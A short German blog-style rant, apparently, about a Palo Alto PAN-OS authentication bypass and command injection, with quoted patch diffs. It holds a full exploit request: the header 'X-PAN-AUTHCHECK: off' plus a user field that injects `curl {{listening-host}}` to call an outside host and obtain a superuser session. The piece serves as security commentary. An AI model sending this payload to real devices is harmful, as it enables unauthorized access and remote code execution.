Ich habe vor einer Weile angefangen, Compliance-Bullshit als Kunstförderung zu bezeichnen, weil es halt reines Theater ist und nichts bringt.

Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.

Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.

X-PAN-AUTHCHECK: off

Ich wünschte, ich würde Witze machen.

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

Und was fiel da raus? Richtig! Eine gültige Session-ID!

Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.

+    $user = $_POST['user'];

+    if (strlen($user) <= 63

-            $_POST['user'],
+            $user,

Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!

Ich wünschte, ich würde Witze machen.

-    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
+    $u = $s->escapeshellarg($username);
+    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");

Wisst ihr was? You had me at PHP. (via)